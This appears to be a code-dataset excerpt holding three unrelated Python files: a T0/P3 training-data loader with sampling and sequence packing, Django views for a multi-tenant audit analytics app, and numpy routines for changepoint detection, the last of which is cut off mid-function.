tqdm\nfrom math import ceil\n\nfrom data_utils import exists_lazy, LazyLoader, LazyWriter\nfrom tasks.data_utils import InputExample\n# from tasks.p3.p3 import large_t0_task_dict, T0_TRAIN_TASK_NAME, ori_t0_ls, zj_para_ls\nfrom tasks.p3.p3 import T0_TRAIN_TASK_NAME, REGISTERED_DATA_LIST\nfrom tasks.p3.pvp import P3PVP\nfrom tasks.superglue.dataset import TEST_SET\nfrom utils import print_rank_0\nfrom SwissArmyTransformer import mpu\nfrom promptsource.templates import DatasetTemplates\nfrom special_tasks_config import no_sample_list\n# import random\n\n# test_target = \"super_glue_rte\"\n# read_file_feat_rte = open(\"/share/zongyu/task_embedding/ours/output/all_idxs_sent_super_glue_rte\", \"r\")\n# tpn2idxs = json.load(read_file_feat_rte)\n\n# task_to_prompt_number={'duorc_ParaphraseRC': 55, 'quoref': 54, 'duorc_SelfRC': 54, 'cosmos_qa': 53, \n# 'social_i_qa': 49, 'quail': 47, 'gigaword': 44, 'common_gen': 44, \n# 'samsum': 44, 'cnn_dailymail_3.0.0': 42, 'sciq': 40, 'ropes': 36, 'xsum': 34, 'qasc': 28, 'dream': 25, 'adversarial_qa_droberta': 23, 'adversarial_qa_dbert': 21, 'quartz': 21, 'trec': 21, 'adversarial_qa_dbidaf': 21, 'wiki_qa': 20, 'amazon_polarity': 18, 'paws_labeled_final': 14, 'imdb': 11, 'cos_e_v1.11': 11, 'dbpedia_14': 11, 'ag_news': 10, \n# 'quarel': 10, 'rotten_tomatoes': 10, 'wiqa': 9, 'glue_qqp': 9, \n# 'wiki_hop_original': 9, 'glue_mrpc': 9, 'kilt_tasks_hotpotqa': 8, \n# 'yelp_review_full': 7, 'multi_news': 6, 'wiki_bio': 5, 'app_reviews': 4}\ntask_to_prompt_number = {\n 'ag_news': 7,\n 'app_reviews': 4,\n 'wiki_bio': 5,\n 'cnn_dailymail/3.0.0': 9,\n 'gigaword': 9,\n 'wiki_hop/original': 9,\n 'glue/mrpc': 7,\n 'glue/qqp': 6,\n 'amazon_polarity': 9,\n 'paws/labeled_final': 12,\n 'dbpedia_14': 4,\n 'dream': 5,\n 'kilt_tasks/hotpotqa': 5,\n 'trec': 18,\n 'multi_news': 6,\n 'samsum': 7,\n 'xsum': 10,\n 'imdb': 11,\n 'rotten_tomatoes': 10,\n 'yelp_review_full': 7,\n 'wiki_qa': 11,\n 'common_gen': 9,\n 'adversarial_qa/dbidaf': 5,\n 'adversarial_qa/dbert': 5,\n 'adversarial_qa/droberta': 5,\n 'quoref': 11,\n 'ropes': 12,\n 'duorc/SelfRC': 9,\n 'duorc/ParaphraseRC': 9,\n 'sciq': 5,\n 'quarel': 5,\n 'qasc': 8,\n 'cosmos_qa': 13,\n 'wiqa': 8,\n 'social_i_qa': 6,\n 'quail': 13,\n 'quartz': 8,\n 'cos_e/v1.11': 11\n }\n\n\ndef get_task_prompt_number(prompted_task_name):\n for task_name in 
list(task_to_prompt_number.keys()):\n cur_task_name = task_name.replace(\"/\", \"_\")\n if prompted_task_name.startswith(cur_task_name):\n return task_to_prompt_number[task_name]\n return None\n\ndef repeat_data(data,repeat_num=None,tgt_num=None):\n if tgt_num:\n repeat_num = ceil(tgt_num / len(data))\n data_ = concatenate_datasets([data for i in range(repeat_num)])\n return data_\n\nclass DataProcessor:\n def __init__(self, args, task_name, tokenizer, lazy_seq2seq_loader=False, **kwargs):\n self.args = args\n self.data_dir = args.multi_cache_dir\n self.max_src_len = self.args.multi_src_seq_length\n self.max_tgt_len = self.args.multi_tgt_seq_length\n self.task_name = task_name\n self.tokenizer = tokenizer\n self.lazy_seq2seq_loader = lazy_seq2seq_loader\n self.max_task_dataset_size = args.max_train_num_per_dataset\n self.loader_scatter = args.loader_scatter\n\n if self.args.t0_upsample_task_names is not None:\n assert len(self.args.t0_upsample_task_names)==len(self.args.t0_upsample_times)\n upsample_ls=[]\n upsample_times={}\n for (dataset_name,upsample_time) in zip(self.args.t0_upsample_task_names,self.args.t0_upsample_times):\n if dataset_name in REGISTERED_DATA_LIST:\n registered_datanames=REGISTERED_DATA_LIST[dataset_name]\n for registered_dataname in registered_datanames:\n upsample_ls.append(registered_dataname)\n upsample_times[registered_dataname]=upsample_time\n else:\n upsample_ls.append(dataset_name)\n upsample_times[dataset_name]=upsample_time\n self.upsample_ls=upsample_ls\n self.upsample_times=upsample_times\n\n def _yield_examples(self, split, dataset):\n raise NotImplementedError\n\n\n \"\"\"\n def get_task_prompt_number(self, task_name):\n for tn in T0_TRAIN_TASK_NAME:\n tn_ = tn.replace(\"/\",\"_\")\n if task_name.startswith(tn_):\n break\n # print(f\"Task Name:{tn}\")\n\n prompt_number = len(DatasetTemplates(tn).all_template_names)\n return prompt_number\n \"\"\"\n\n\n def create_examples(self, split, rng):\n current_idx = mpu.get_data_parallel_rank() % self.loader_scatter\n filepath = os.path.join(self.data_dir, self.task_name, split)\n print(filepath)\n dataset = load_from_disk(filepath)\n\n\n total_number = len(dataset)\n print_rank_0(f\"Original total number: {total_number} | split: {split} | task: {self.task_name}.\")\n\n if total_number > self.max_task_dataset_size and self.task_name not in no_sample_list:\n prompt_number = get_task_prompt_number(self.task_name)\n # assert prompt_number is not None\n current_number = int(self.max_task_dataset_size / prompt_number)\n # rng = random.Random(1234)\n random_list = rng.sample(population=list(range(total_number)),k=current_number)\n else:\n current_number = total_number\n random_list = list(range(total_number))\n # 0412\n # prompt_number = get_task_prompt_number(self.task_name)\n # assert prompt_number is not None\n # current_number = int(self.max_task_dataset_size / prompt_number) # fixed for each dataset\n\n # if current_number >= total_number:\n # cur_data = dataset\n # else:\n # # rng = random.Random(1234)\n # random_list = rng.sample(population=list(range(total_number)),k=current_number)\n # ###\n\n # start_number = int(current_idx / 8 * current_number)\n # end_number = int((current_idx + 1) / 8 * current_number)\n # idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n # cur_data = dataset.select(idx_list)\n start_number = int(current_idx / self.loader_scatter * current_number)\n end_number = int((current_idx + 1) / self.loader_scatter * current_number)\n 
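# Editor's note (hedged illustration): with loader_scatter = 8,\n        # current_number = 500 and rank = 3, the two lines above select\n        # random_list[187:250], i.e. each of the 8 data-parallel ranks\n        # receives a disjoint ~1/8 slice of the (possibly subsampled)\n        # index list built above.\n        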
idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n cur_data = dataset.select(idx_list)\n\n # prepare the upsample list in self.__init__\n if self.args.t0_upsample_task_names is not None and self.task_name in self.upsample_ls:\n print(self.task_name,self.upsample_times[self.task_name])\n cur_data=repeat_data(cur_data,repeat_num=self.upsample_times[self.task_name])\n \n print_rank_0(f\"Per-rank number: {len(cur_data)} | split: {split} | task: {self.task_name}.\")\n print_rank_0(\"\\n\")\n source_texts, target_texts = [], []\n for data_example in cur_data:\n source_texts.append(data_example[\"inputs_pretokenized\"])\n target_texts.append(data_example[\"targets_pretokenized\"])\n return source_texts, target_texts\n\n\n \"\"\"\n current_idx = mpu.get_data_parallel_rank() % 8\n filepath = os.path.join(self.data_dir, self.task_name, split)\n dataset = load_from_disk(filepath)['train'] # version\n total_number = len(dataset)\n print_rank_0(f\"Original total number: {total_number} | split:{split} | task: {self.task_name}\")\n if total_number >= self.max_task_dataset_size:\n prompt_number = self.get_task_prompt_number(self.task_name)\n assert prompt_number is not None\n current_number = int(self.max_task_dataset_size / prompt_number)\n rng = random.Random(1234)\n random_list = rng.sample(population=list(range(total_number)),k=current_number)\n else:\n current_number = total_number\n random_list = list(range(total_number))\n start_number = int(current_idx / 8 * current_number)\n end_number = int((current_idx + 1) / 8 * current_number)\n idx_list = random_list[start_number:end_number] if (start_number != end_number) else [random_list[start_number]]\n cur_data = dataset.select(idx_list)\n print_rank_0(f\"Per-rank number: {len(cur_data)} | split: {split} | task: {self.task_name}.\")\n print_rank_0(\"\\n\")\n example_list = []\n for idx, example in enumerate(self._yield_examples(split, cur_data)):\n if (idx + 1) % 20000 == 0:\n print_rank_0(f\"Complete {idx + 1} examples\")\n example_list.append(example)\n return example_list\n \"\"\"\n \"\"\"\n def create_examples_raw(self, split, selected=False):\n\n print_rank_0(f\"Creating {split} dataset from {self.data_dir} for task {self.task_name}.\")\n \n if not self.lazy_seq2seq_loader:\n\n assert self.args.loader_scatter == 8, \"--loader_scatter should be fixed to be 8.\"\n current_idx = mpu.get_data_parallel_rank() % 8 # [0,1,2,3,4,5,6,7]\n filepath = os.path.join(self.data_dir, self.task_name, split + \".json\")\n print_rank_0(self.task_name)\n if selected:\n start = int(current_idx/8 * 100)\n end = int((current_idx + 1)/8 * 100)\n print_rank_0(split + f\"[{start}%:{end}%]\")\n split_str = split + f\"[{start}%:{end}%]\"\n elif self.task_name in list(large_t0_task_dict.keys()) and split == \"train\":\n total_num = large_t0_task_dict[self.task_name]\n start_number = int(current_idx/8 * total_num)\n end_number = int((current_idx + 1)/8 * total_num)\n print_rank_0(f\"{split}[{start_number}:{end_number}]\")\n split_str = f\"{split}[{start_number}:{end_number}]\"\n else:\n start = int(current_idx/8 * 100)\n end = int((current_idx + 1)/8 * 100)\n print_rank_0(split + f\"[{start}%:{end}%]\")\n split_str = split + f\"[{start}%:{end}%]\"\n print(f\"Begin loading file:{filepath}\")\n random_sample = False\n select = False\n # dataset = load_dataset(\"json\", data_files={split: filepath}, split=split_str,cache_dir=\"/share/zongyu/save/cache/huggingface/datasets\",download_mode='force_redownload')\n dataset 
= load_dataset(\"json\", data_files={split: filepath}, split=split_str,cache_dir=\"/root/.cache/huggingface/datasets\")\n # if random_sample and split == \"train\":\n # seed_ = 58 # 42,58,30,24,10\n # sample_ratio = 0.9\n # dataset.shuffle(seed=seed_)\n # data_size = len(dataset)\n # sample_num = int(sample_ratio*data_size)\n # dataset = dataset.select(list(range(sample_num)))\n # if select and split == \"train\":\n # data_size = len(dataset)\n # dataset = dataset.select(tpn2idxs[self.task_name])\n # print_rank_0(f\"Choose {len(dataset)} from {data_size} samples for {self.task_name}.\")\n example_list = []\n for idx, example in enumerate(self._yield_examples(split, dataset)):\n if (idx + 1) % 20000 == 0:\n print_rank_0(f\"Complete {idx + 1} examples\")\n example_list.append(example)\n else:\n raise NotImplementedError(\"lazy_seq2seq_loader not implemented.\")\n\n print_rank_0(f\"Creating {len(example_list)} examples for {split} of task {self.task_name}.\")\n return example_list\n \"\"\"\n\n\nclass P3Processor(DataProcessor):\n def _yield_examples(self, split, dataset):\n source_texts, target_texts = [], []\n assert \"inputs_pretokenized\" in dataset.features\n assert \"targets_pretokenized\" in dataset.features\n for data_example in dataset:\n source_text = data_example[\"inputs_pretokenized\"]\n source_texts.append(source_text)\n target_text = data_example[\"targets_pretokenized\"]\n target_texts.append(target_text)\n assert len(source_texts) == len(target_texts)\n\n eos_token = self.tokenizer.get_command('eos').token\n\n def exceed_maximum_length(prev_inputs, inputs, max_seq_len, is_source, mask_token_index):\n assert isinstance(prev_inputs, str) and isinstance(inputs, str)\n prev_tok = self.tokenizer.EncodeAsIds(prev_inputs).tokenization\n assert len(prev_tok) <= max_seq_len\n tok = self.tokenizer.EncodeAsIds(inputs).tokenization\n\n if len(tok) >= max_seq_len - 2:\n tok = tok[:(max_seq_len - 2)]\n inputs = self.tokenizer.DecodeIds(tok)\n\n if self.args.t0_format == \"lm_format\":\n if len(prev_tok) + len(tok) < max_seq_len - 2:\n ret_inputs = prev_inputs + (inputs + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs\n return True, ret_inputs\n\n elif self.args.t0_format == \"denoise_format\":\n if len(prev_tok) + len(tok) < max_seq_len - 2:\n mask_token = self.tokenizer.get_command(f\"MASK{mask_token_index}\").token\n if is_source:\n ret_inputs = prev_inputs + (inputs + mask_token + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs + (mask_token + inputs + eos_token)\n return False, ret_inputs\n else:\n ret_inputs = prev_inputs\n return True, ret_inputs\n else:\n raise ValueError(\"Unknown format.\")\n\n if not self.args.packing:\n if self.args.t0_format == \"lm_format\":\n for idx, (source_text, target_text) in enumerate(zip(source_texts, target_texts)):\n guid = \"%s-%s\" % (split, idx)\n meta = {\"ref\": self.tokenizer.DecodeIds(self.tokenizer.EncodeAsIds(target_text).tokenization)}\n example = InputExample(guid=guid, text_a=source_text, text_b=target_text, meta=meta)\n if idx < 3:\n print_rank_0((source_text.encode('utf-8'), target_text.encode('utf-8'), meta[\"ref\"].encode('utf-8')))\n yield example\n elif self.args.t0_format == \"denoise_format\":\n raise NotImplementedError(\"Not implemented denoise_format for non-packing.\")\n else:\n raise NotImplementedError(\"Not implemented format.\")\n else:\n print_rank_0(\"Packing data.\")\n assert self.args.t5_model, \"Only implement packing for T5Model.\"\n packed_source_texts, 
packed_target_texts = [], []\n cur_src_texts = \"\"\n cur_tgt_texts = \"\"\n mask_index = 0\n for source_text, target_text in tqdm(zip(source_texts, target_texts)):\n src_flag, temp_src = exceed_maximum_length(cur_src_texts, source_text, self.max_src_len,\n is_source=True, mask_token_index=mask_index)\n tgt_flag, temp_tgt = exceed_maximum_length(cur_tgt_texts, target_text, self.max_tgt_len,\n is_source=False, mask_token_index=mask_index)\n if (not src_flag) and (not tgt_flag):\n cur_src_texts = temp_src\n cur_tgt_texts = temp_tgt\n mask_index += 1\n else:\n packed_source_texts.append(cur_src_texts)\n packed_target_texts.append(cur_tgt_texts)\n mask_index = 0\n _, cur_src = exceed_maximum_length(\"\", source_text, self.max_src_len,is_source=True,\n mask_token_index = mask_index)\n _, cur_tgt = exceed_maximum_length(\"\", target_text, self.max_tgt_len,is_source=False,\n mask_token_index = mask_index)\n cur_src_texts = cur_src\n cur_tgt_texts = cur_tgt\n\n for idx, (source_text, target_text) in enumerate(zip(packed_source_texts, packed_target_texts)):\n guid = \"%s-%s\" % (split, idx)\n meta = {\"ref\": self.tokenizer.DecodeIds(self.tokenizer.EncodeAsIds(target_text).tokenization)}\n example = InputExample(guid=guid, text_a=source_text, text_b=target_text, meta=meta)\n if idx < 3:\n print_rank_0((source_text.encode('utf-8'), target_text.encode('utf-8'), meta[\"ref\"].encode('utf-8')))\n yield example\n\n\n\nclass P3Dataset(Dataset):\n def __init__(self, args, task_name, split, tokenizer, is_training=True, rng=None):\n self.args = args\n self.task = task_name\n self.t5_model = args.t5_model\n self.max_src_length, self.max_tgt_length = args.multi_src_seq_length, args.multi_tgt_seq_length\n self.split = split\n self.tokenizer = tokenizer\n self.dataset_name = split\n self.is_training = is_training\n self.rng = rng\n \n \"\"\"\n self.processor = P3Processor(self.args, self.task, tokenizer, lazy_seq2seq_loader=False)\n example_list = self.processor.create_examples(split)\n self.example_list = example_list\n self.examples = {example.guid: example for example in example_list}\n \"\"\"\n\n self.processor = DataProcessor(self.args, self.task, tokenizer, lazy_seq2seq_loader=False)\n self.source_texts, self.target_texts = self.processor.create_examples(split,rng)\n\n print_rank_0(f\"Return {len(self.source_texts)} {split} examples for task {task_name}.\")\n\n def __len__(self):\n return len(self.source_texts)\n\n def __getitem__(self, idx):\n # example = self.example_list[idx]\n source_text, target_text = self.source_texts[idx], self.target_texts[idx]\n pad_id = self.tokenizer.get_command('pad').Id\n sop_id = self.tokenizer.get_command('sop').Id\n\n if self.t5_model:\n eos_id = self.tokenizer.get_command('eos').Id\n # source_text, target_text = example.text_a, example.text_b\n\n if not self.args.packing:\n source_tokens = self.tokenizer.EncodeAsIds(source_text).tokenization\n if len(source_tokens) > self.max_src_length - 1:\n source_tokens = source_tokens[: (self.max_src_length - 1)]\n source_tokens = source_tokens + [eos_id]\n else:\n source_tokens = self.tokenizer.EncodeAsIds(source_text).tokenization\n\n attention_mask = [1] * len(source_tokens)\n if len(source_tokens) < self.max_src_length:\n pad_length = self.max_src_length - len(source_tokens)\n source_tokens = source_tokens + [pad_id] * pad_length\n attention_mask = attention_mask + [0] * pad_length\n\n # if self.split == \"train\" or self.split == \"validation\":\n if self.is_training:\n if not self.args.packing:\n target_tokens = 
self.tokenizer.EncodeAsIds(target_text).tokenization\n if len(target_tokens) > self.max_tgt_length - 1:\n target_tokens = target_tokens[: (self.max_tgt_length - 1)]\n target_tokens = target_tokens + [eos_id]\n else:\n target_tokens = self.tokenizer.EncodeAsIds(target_text).tokenization\n\n loss_mask = [1] * len(target_tokens)\n if len(target_tokens) < self.max_tgt_length:\n pad_length = self.max_tgt_length - len(target_tokens)\n target_tokens = target_tokens + [pad_id] * pad_length\n loss_mask = loss_mask + [0] * pad_length\n\n sample = {'text': np.array(source_tokens, dtype=np.int64),\n 'target': np.array(target_tokens, dtype=np.int64),\n 'attention_mask': np.array([[attention_mask]], dtype=np.int64),\n 'loss_mask': np.array(loss_mask, dtype=np.int64),\n #\"uid\": example.guid\n }\n else:### TODO: test sets of training tasks are not used.\n sample = {\n 'text': np.array(source_tokens, dtype=np.int64),\n 'attention_mask': np.array([[attention_mask]], dtype=np.int64),\n # \"uid\": example.guid\n }\n else:\n eop_id = self.tokenizer.get_command('eop').Id\n pvp = P3PVP(self.tokenizer,\n max_src_length=self.max_src_length,\n max_tgt_length=self.max_tgt_length,\n task_mask=self.args.task_mask)\n mask_id = pvp.mask_id\n source_tokens, target_text = pvp.encode(example)\n\n if len(source_tokens) < self.max_src_length:\n source_tokens = source_tokens + [pad_id] * (self.max_src_length - len(source_tokens))\n sep = len(source_tokens)\n position_ids = list(range(len(source_tokens)))\n block_position_ids = [0] * len(source_tokens)\n mask_pos = source_tokens.index(mask_id)\n\n # if self.split == 'train' or self.split == \"validation\":\n if self.is_training:\n target_tokens = self.tokenizer.EncodeAsIds(\" \" + target_text).tokenization\n target_tokens = target_tokens + [eop_id]\n\n if len(target_tokens) > self.max_tgt_length:\n target_tokens = target_tokens[:self.max_tgt_length]\n loss_mask = [1] * len(target_tokens)\n\n if len(target_tokens) < self.max_tgt_length:\n loss_mask += [0] * (self.max_tgt_length - len(target_tokens))\n target_tokens += [pad_id] * (self.max_tgt_length - len(target_tokens))\n\n tokens = source_tokens + [sop_id] + target_tokens[:-1]\n loss_mask = [0] * len(source_tokens) + loss_mask\n target_ids = [0] * len(source_tokens) + target_tokens\n position_ids += [mask_pos] * len(target_tokens)\n if self.args.no_block_position:\n block_position_ids += [1] * len(target_tokens)\n else:\n block_position_ids += list(range(1, len(target_tokens) + 1))\n position_ids = [position_ids, block_position_ids]\n sample = {'text': np.array(tokens, dtype=np.int64),\n 'target': np.array(target_ids, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64),\n 'loss_mask': np.array(loss_mask, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n \"uid\": example.guid}\n else:\n tokens = source_tokens + [sop_id]\n position_ids = position_ids + [mask_pos]\n block_position_ids = block_position_ids + [1]\n position_ids = [position_ids, block_position_ids]\n sample = {'text': np.array(tokens, dtype=np.int64),\n 'attention_mask': np.array(sep, dtype=np.int64),\n \"position_id\": np.array(position_ids, dtype=np.int64),\n \"uid\": example.guid}\n return sample\n","repo_name":"zhouj8553/Improving-T0","sub_path":"tasks/p3/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":24438,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"32425637186","text":"from django.shortcuts import 
render,redirect,get_object_or_404,reverse\n# from customers.models import Mapping\nfrom audtech_analytics.models import Engagement,FinalTable,CompanyInfo\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files.storage import FileSystemStorage\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.decorators import permission_required\nimport pandas as pd\nimport pdfkit \nfrom django.conf import settings\nfrom django_pandas.io import read_frame\nfrom django.contrib.auth.models import Permission,Group\nfrom customers.forms import EngagementForm,CreateUserForm,companyinfo\nfrom django.db.models.functions import Cast\nfrom tenant_schemas.utils import schema_context\nfrom django.contrib import messages\n# Create your views here.\n\ndef main_page(request):\n return render(request,'index2.html')\ndef PermissionDenied(request):\n return render(request,'PermissionDenied.html')\n# def form(request):\n# return render(request,'alertcreated.html')\n\n\n \ndef CompanyInformation(request):\n context={}\n if request.method == 'GET':\n context['username']=request.session.get('username')\n form = companyinfo()\n context['form']=form\n return render(request,'companyinfo.html',context)\n elif request.method ==\"POST\":\n with schema_context(request.session.get('schema_name')):\n form = companyinfo(request.POST,request.FILES)\n if form.is_valid():\n New=form.save(commit=False)\n New.user_id=request.session.get('username')\n New.logo=request.FILES.get(\"logo\")\n New.save()\n return redirect('/home2')\n else:\n messages.error(request,str(form.errors.as_text()))\n return render(request,'companyinfo.html',context)\n\ndef navbar(request):\n context={}\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n context['logo']=request.session.get(\"logo\")\n return render(request,'nav.html',context)\ndef handler404(request):\n return render(request, '404.html', status=404)\ndef handler500(request):\n return render(request, '404.html', status=404)\ndef DisplayData(request):\n context={}\n if request.method==\"GET\": \n with schema_context(request.session.get('schema_name')): \n context['objects']=(pd.DataFrame(read_frame(FinalTable.objects.all()))).to_html()\n return render(request,'showdata.html',context)\ndef pdfconvertor(request):\n pdfkit.from_url(settings.BASE_DIR+'/templates/'+'analytics.html', 'out.pdf')\n return HttpResponse(\"'out.pdf'\")\ndef Home(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['clientname']=request.session.get('clientname')\n context['engangement']=request.session.get('engangement')\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n with schema_context(request.session.get('schema_name')):\n details=Engagement.objects.filter(user_id=request.session.get('username'))\n context['details']=details\n return render(request,'home.html',context)\ndef Home2(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['clientname']=request.session.get('clientname')\n context['username']=request.session.get('username')\n context['engangement']=request.session.get('engangement')\n context['customer']=request.session.get('schema_name')\n with schema_context(request.session.get(\"schema_name\")):\n CL=CompanyInfo.objects.get(name=request.session.get(\"schema_name\"))\n uploaded_file_url = 
CL.logo.url\n request.session['logo']=uploaded_file_url\n print(request.session.get('logo'))\n details=User.objects.all()\n context['details']=details\n return render(request,'home2.html',context)\n# return render(request,'NewClient.html',context)\n# def ERPMap (request):\n# context={}\n# context['engangement']=request.session.get(\"engangement\")\n# context['username']=request.session.get('username')\n# context['customer']=request.session.get('schema_name')\n# if request.method == 'GET':\n# form = ERPform()\n# context['form']=form\n# return render(request,'ERPForm.html',context)\n# elif request.method =='POST':\n# form = ERPform(request.POST,request.FILES)\n# print(form)\n# if form.is_valid():\n# #obj=form.save(commit=False)\n# form=ERPform()\n# context['form']=form\n# obj=Mapping.objects.create(source_filed=request.POST.get(\"source_filed\"),final_field=request.POST.get(\"final_field\"),transaction_type=request.POST.get(\"transaction_type\"),erp=request.POST.get(\"erp\"))\n# data=Mapping.objects.filter(erp=request.POST.get('erp'))\n# context['data']=data\n# return render(request,'ERPForm.html',context)\n# else:\n# context['form']=form\n# return render(request,'ERPForm.html',context)\n\nfrom django.views.generic.edit import UpdateView\ndef CreateUser (request):\n context={}\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n context['clientname']=request.session.get(\"clientname\")\n if request.method == 'GET':\n with schema_context(request.session.get('schema_name')):\n form = CreateUserForm()\n context['form']=form\n return render(request,'createuser.html',context)\n elif request.method == 'POST':\n with schema_context(request.session.get('schema_name')):\n form = CreateUserForm(request.POST)\n if form.is_valid():\n # if request.POST.get(\"username\").isspace():\n # return HttpResponse(\"ytuusywys\")\n user=form.save(commit=False)\n # user.refresh_from_db()\n user.save()\n # group=Group.objects.get(id=request.POST.get('groups'))\n for i in request.POST.getlist('user_permissions'):\n permission = Permission.objects.get(name =i)\n # group.permissions.add(permission)\n user = User.objects.get(username=request.POST.get('username'))\n user.user_permissions.add(permission)\n user=user.id\n # group.user_set.add(user)\n return redirect('/home2')\n else:\n messages.error(request,str(form.errors.as_text())) \n form = CreateUserForm()\n context['form']=form\n return render(request,'createuser.html',context)\n# class UserInformation(request)\n \n# @permission_required(\"audtech_analytics.add_engagement\",login_url='/PermissionDenied')\ndef EngagementDATA(request):\n context={}\n context['logo']=request.session.get(\"logo\")\n context['username']=request.session.get('username')\n context['customer']=request.session.get('schema_name')\n if request.method == 'GET':\n with schema_context(request.session.get('schema_name')):\n form = EngagementForm()\n context['form']=form\n return render(request,'NewClient.html',context)\n elif request.method =='POST':\n with schema_context(request.session.get('schema_name')):\n form = EngagementForm(request.POST,request.FILES)\n if form.is_valid():\n obj=form.save(commit=False)\n request.session[\"engangement\"]=request.POST.get(\"engagement_name\")\n request.session[\"clientname\"]=request.POST.get('name')\n request.session[\"Currency\"]=request.POST.get('Currency')\n request.session[\"start_month\"]=request.POST.get('fiscal_start_month').strip('/')\n 
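# Editor's note (hedged): these views all follow the same\n                # django-tenant-schemas pattern -- ORM calls are wrapped in\n                # schema_context() so they run against the tenant schema\n                # named in the session, e.g.:\n                #     with schema_context(request.session.get('schema_name')):\n                #         Engagement.objects.filter(...)\n                # the schema name is assumed to have been stored at login.\n                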
request.session[\"end_month\"]=request.POST.get('fiscal_end_month').strip('/')\n # request.session[\"erp\"]=request.POST.get(\"financial_management_system\")\n obj.user_id=request.session.get('username')\n obj.save()\n user=User.objects.get(username=request.session.get('username'))\n print(user)\n if user.has_perm(\"audtech_analytics.is_import\"):\n return redirect('/processfile')\n else:\n return redirect(\"/home\")\n else:\n context['form']=form\n return render(request,'NewClient.html',context)\n return render(request,'NewClient.html',context)\n\n\n\n\n","repo_name":"Rishitosh210/oldDBAnalyst","sub_path":"audtech_analytics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40914521466","text":"import numpy as np\nimport warnings\nimport matplotlib.pyplot as plt\n\n\ndef isCPvector(tau, N, K):\n \"\"\"\n Given tau an array of potential CP vectors, check whether these potential CP vectors\n are actually CP vectors as defined above\n \"\"\"\n assert K + 1 <= N\n length = tau.shape[-1] == K + 2\n is_sorted = np.all(tau[..., :-1] < tau[..., 1:])\n init = (tau[..., 0] == -1).all()\n last = (tau[..., -1] == N - 1).all()\n return length and is_sorted and init and last\n\n\ndef eta(N, k, tau_det):\n \"\"\"\n Return eta_k as defined in [§2.2, Article]\n \"\"\"\n assert k >= 1\n indices = np.arange(N)\n return (1 / (tau_det[k] - tau_det[k - 1])) * (tau_det[k - 1] < indices) * (\n indices <= tau_det[k]\n ) - (1 / (tau_det[k + 1] - tau_det[k])) * (tau_det[k] < indices) * (\n indices <= tau_det[k + 1]\n )\n\n\ndef decompose(N, k, Sigma, tau_det, X):\n \"\"\"\n Given a signal X, returns a,b as defined in [§3.1, Article]\n \"\"\"\n eta_k = eta(N, k, tau_det)\n assert not np.isnan(eta_k).any()\n c = Sigma @ eta_k / (np.dot(eta_k, Sigma @ eta_k))\n return (X - np.dot(eta_k, X) * c), c\n\n\ndef get_QF_C(a, b, tau, kappa):\n \"\"\"\n Compute the coefficient of the quadratic form z -> C(x(z)_{tau_{kappa-1}+1:tau_kappa})\n as used in [(11), Article]\n \"\"\"\n # sum_i b_i**2 z**2 + 2za_ib_i + a_i**2 - (e - s + 1) * (mean(a)**2 + 2 * mean(a)mean(b)z + mean(b)**2 z**2)\n assert kappa >= 1\n assert kappa < len(tau)\n s = tau[kappa - 1] + 1\n e = tau[kappa]\n if e == s:\n return np.zeros(3)\n\n coeff = np.empty(3)\n cov_matrix = np.cov(np.stack([a[s : e + 1], b[s : e + 1]]))\n assert s < e\n assert not np.isnan(cov_matrix).any(), (s, e)\n coeff[0] = (e - s + 1) * cov_matrix[1, 1] # np.var(b[s:e+1]) = dom coeff\n coeff[2] = (e - s + 1) * cov_matrix[0, 0] # np.var(a[s:e+1])\n coeff[1] = 2 * (e - s + 1) * cov_matrix[0, 1] # np.corrcoef(a[s:e+1], b[s:e+1])\n assert not np.isnan(coeff).any()\n return coeff\n\n\ndef get_QF(n, k, a, b, tau):\n return np.sum(\n np.stack([get_QF_C(a, b, tau, kappa) for kappa in range(1, k + 2)], axis=0),\n axis=0,\n )\n\n\ndef eval_poly(coeffs, z):\n \"\"\"\n Given coeffs a matrix of shape (*, 3) where each row represents the coefficients of a quadratic form,\n eval those quadratic forms at point z\n \"\"\"\n return coeffs[..., 0] * z ** 2 + coeffs[..., 1] * z + coeffs[..., 2]\n\n\ndef compute_break_points(a, b, c, z_u):\n \"\"\"\n Compute the set of breakpoints appearing in [Lemma 1, Report]\n \"\"\"\n Delta = b ** 2 - 4 * a * c\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n sol = (-b - np.sqrt(Delta)) / (2 * a)\n\n degree_one = np.logical_and(np.isclose(a, 0), ~np.isclose(b, 0))\n sol[degree_one] = -c[degree_one] / 
b[degree_one]\n\n    degree_zero = np.logical_and(np.isclose(a, 0), np.isclose(b, 0))\n    sol[degree_zero] = float(\"nan\")\n\n    condition = np.logical_and(sol > z_u, np.logical_not(np.isnan(sol)))\n    condition = np.logical_and(condition, Delta > 0)\n    sol[np.logical_not(condition)] = float(\"inf\")\n\n    return sol\n\n\ndef next_break_point(a, b, c, z_u):\n    \"\"\"\n    Perform one step of [Lemma 1, Report]\n    \"\"\"\n    breakpoints = compute_break_points(a, b, c, z_u)\n\n    break_ind = np.argmin(breakpoints, axis=None)\n    break_val = np.min(breakpoints)\n\n    if break_val == float(\"inf\"):\n        return None\n\n    check_atol = 1e-8\n    check_rtol = 1e-7\n    if (\n        not np.sum(\n            np.isclose(\n                breakpoints,\n                break_val * np.ones_like(breakpoints),\n                atol=check_atol,\n                rtol=check_rtol,\n            )\n        )\n        == 1\n    ):\n        print(breakpoints, break_val)\n        indices = np.isclose(\n            breakpoints,\n            break_val * 